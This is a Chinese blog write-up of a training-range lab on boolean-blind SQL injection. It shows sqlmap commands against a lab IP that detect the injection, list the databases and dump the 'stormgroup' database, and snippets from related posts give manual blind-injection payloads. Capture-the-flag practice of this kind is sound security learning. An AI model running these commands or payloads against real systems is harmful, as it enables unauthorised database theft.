墨者靶场 SQL注入漏洞测试(布尔盲注)

最新推荐文章于 2023-07-28 21:08:01 发布
最新推荐文章于 2023-07-28 21:08:01 发布
阅读量5.1k 收藏 5
点赞数 3
分类专栏: CTF小白 文章标签: web 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45736958/article/details/117913966
版权
本文通过查看页面源代码找到SQL注入点,接着使用sqlmap进行测试,解码status=1的密码并成功登录,揭示了SQL布尔盲注的完整过程。
摘要由CSDN通过智能技术生成

初级 布尔盲注

一、查看页面源代码,发现注入点

image-20210614220555492

二、sqlmap一把梭
┌──(root💀caozhenguo)-[~/桌面]
└─# sqlmap -u http://219.153.49.228:40972/new_list.php?id=1

image-20210614220818565

查询库
┌──(root💀caozhenguo)-[~/桌面]
└─# sqlmap -u http://219.153.49.228:40972/new_list.php?id=1 --dbs

image-20210614221353476

输出全部数据
┌──(root💀caozhenguo)-[~/桌面]
└─# sqlmap -u http://219.153.49.228:40972/new_list.php?id=1 -D stormgroup --dump

最低0.47元/天 解锁文章
曹振国cc
关注
  • 3
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
墨者学院的靶场SQL注入漏洞测试(布尔盲注)
BEGCCYD的博客
06-23 787
*这是我第一次在kali里面成功的把key找出来了,所以分享一下 **墨客学院的靶场SQL注入漏洞测试(布尔盲注) IP地址 : 219.153.49.228 端口 : 43484 协议 : http 首先我输入了IP地址 看到这个后,我在想它手工注入一下,看它有没有漏洞 删除文本 引用文本 H2O is是液体。 210 运算结果是 1024。 ...
墨者学院-SQL注入漏洞测试(布尔盲注)
JimWu的博客
09-04 2693
SQL注入漏洞测试(布尔盲注) 难易程度:★ 题目类型:SQL注入 使用工具:FireFox浏览器、kali 1.打开靶场,寻找注入点。 点击公告/new_list.php?id=1,找到注入点。 2.输入id=1’ and 1=1,返回空页面 输入id=1 and 1=1,返回正常页面。 3.判断数据库名字的长度,输入id=1 and length(database())=1,返回空白页,证...
02#墨者靶场-SQL注入漏洞测试(布尔盲注)
shy的博客
11-15 760
墨者学习 By/shy014 1.进入靶场环境发现后台管理页面,尝试弱口令和万能密码失败,抓包查看登陆处也没有发现注入漏洞。 2.仔细查看该页面,发现一个新的链接,点击跳转,发现可能存在注入...
在线靶场-墨者-SQL注入1星-SQL注入漏洞测试(布尔盲注)
weixin_42079912的博客
07-18 889
背景介绍 一位热心的网友再次向“墨者安全工程师挑战,“墨者”工程师在注入时发现网页无回显,“墨者”工程师想了一会就注入完成拿到了key。 实训目标 1、掌握SQL注入原理; 2、了解MySQL的数据结构; 3、了解布尔盲注相关语句; 解题方法: 运用sqlmap工具对数据库进行爆破 1.判断注入点存在:python sqlmap.py -u “ip” 2.判断数据库名称:python sqlma...
墨者学院03 SQL注入漏洞测试(布尔盲注)
weixin_42789937的博客
01-24 437
墨者学院03 SQL注入漏洞测试(布尔盲注),脚本小子的SQL注入实战~
墨者学院——SQL注入漏洞测试(布尔盲注)
Lollipop_zhi的博客
01-11 384
启动靶场,熟悉的界面 点击登录下方的维护通知 地址栏醒目的id出现了,尝试一下id =1’ and 1=1,空白页面 直接开kali,上sqlmap 输入sqlmap -u http://219.153.49.228:45239/new_list.php?id=1 --current -db 得到数据库名称:stormgroup 输入 sqlmap -u http://219.153.49.228:47334/new_list.php?id=1 -D stormgroup --tab..
墨者靶场 入门:SQL注入漏洞测试布尔盲注
qq_43233085的博客
01-09 711
入门:SQL注入漏洞测试布尔盲注) 启动靶场环境,得到测试地址 http://219.153.49.228:44500/ 访问页面,寻找sql注入点,访问注入页面。 http://219.153.49.228:44500/new_list.php?id=1 使用sql注入工具,如sqlmap或穿山甲,进行布尔盲注。 本次使用穿山甲进行注入。 对密码密文进行MD5解码,得到密码明文,解...
墨者学院-SQL注入漏洞测试布尔盲注
weixin_42939822的博客
03-20 4347
决心按部就班、由浅入深地去剖析下sql注入题目提供的靶场环境,完善自身解题思路。本题靶场环境比较简单、也比较常见,没有设置严格的过滤规则,仅仅是限制了页面的回显功能,属于比较初级的sql注入题目。废话不多说啦,先附上题目链接:https://www.mozhe.cn/bug/detail/UDNpU0gwcUhXTUFvQm9HRVdOTmNTdz09bW96aGUmozhe*
墨者-SQL注入漏洞测试(报错盲注)
wh1sper、的博客
07-04 798
墨者-SQL注入漏洞测试前言一、sqlmap二、手注1.报错注入2.时间注入3.联合查询union被过滤总结 前言 本题为墨者学院在线靶场 进入题目发现是个登录界面,找了好久,最后在关于平台停机维护的通知的页面找到了注入点 判断注入类型,当输入?id=1’ and 1=1 %23时,页面显示正常。 ?id=1' and 1=1 %23 当输入?id=1’ and 1=2 %23时,页面显示不正常。 由此判断注入类型为单字符注入。 一、sqlmap 首先先清理sqlmap的缓存。 python sq
墨者学院—SQL注入漏洞测试(布尔盲注)
没事我溜达
03-18 2109
靶场地址:SQL注入漏洞测试(布尔盲注)_SQL注入_在线靶场_墨者学院_专注于网络安全人才培养 打开靶场 我们先判断注入点,通过and 1 = 1和and 1 = 2来判断 发现页面存在注入点,且是数字型注入,但是id不为1时则没有任何回显,那我们只能判定是布尔盲注。 构造语句来证明我的想法 and length(database())= 10 发现页面在数据库长度为10的条件下回显正常,那么就证明了该点确实是存在布尔盲注的,为了节约时间我们放到sqlma...
墨者学院-入门级-SQL注入漏洞测试(布尔盲注)-小白必看(超详细)
kitiu666的博客
08-26 4172
2020年8月25日,第五次渗透测试。 通过对sql语句进行注入,数据库的库名,表名,字段进步爆破,最终获得key。 准备需求: 1.windows系统pc 2.2.burpsuite(bp)抓包软件 3.sqlmap sql 数据库的爆破工具 1.进入靶场 ...
SQL注入-布尔盲注
weixin_45095113的博客
03-12 775
布尔盲注
盲注——漏洞/靶场操作记录
chick11的博客
07-07 214
SQL注入漏洞测试(布尔盲注)——解题记录 打开靶场界面 先简单查看url,在输入框输入东西。都没有反应。 看到下方滚动条,点击后页面跳转。 查看url,对url进行简单的漏洞测试,发现页面只有T/F。盲注存在! 对于盲注最快的无非是sqlmap sqlmap -U --batch --dbs ....... password 密文 可尝试各种解密。一般md5 完成布尔盲注 难点:找注入点,细心。 技术特点:手工注入只能返回T/F ,需要猜! 什么是盲注
shark2注入工具-盲注靶机练习
qq_29437513的博客
07-27 244
shark2 开发的SuperInjection 工具,是window视窗版的, 觉得比sqlmap黑黑的命令行更友好。 这里做靶机的盲注练习,为的是过段时间渗透用的顺手。 用的环境: sqli-8 关键字:You are in 按作者的文档所说: 先编码,在做payload标记,如图 可是呢? 这是盲注,需要设置关键词来区分T和F,这里很明显关键词就是You Are In 完全没有识别出正常页面的关键词 通过发包,可以看到payload一切正常,response里存在关键字 但不能识别关键词,
遇事不决,一把哈——sqlmap
weixin_58782362的博客
07-28 530
有些网站只能在手机访问,但是sqlmap默认的访问头是电脑头,有些网站就是看文件头的base64编码注入点,需要对参数进行编码,才能进行注入。sqlmap里有自带的过滤规则。在进行post注入的时候,可以在后面加*(其实可以在数据包每行后面都加上一个*),数据包的完整性。
SQLMap使用教程:从入门到入狱详细指南
qq_61553520的博客
04-14 6754
本文会主要介绍SQLMap的使用,包括常用的参数,常用的语句,以及常用的功能。
墨者靶场sql布尔盲注
最新发布
10-09
针对墨者靶场的 SQL 布尔盲注,你需要先了解 SQL 注入的基本概念和实现方式。在进行布尔盲注时,需要通过构造特定的 SQL 语句来判断数据库中是否存在某些数据或条件,从而实现注入攻击。以下是一些可能用到的注入...
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值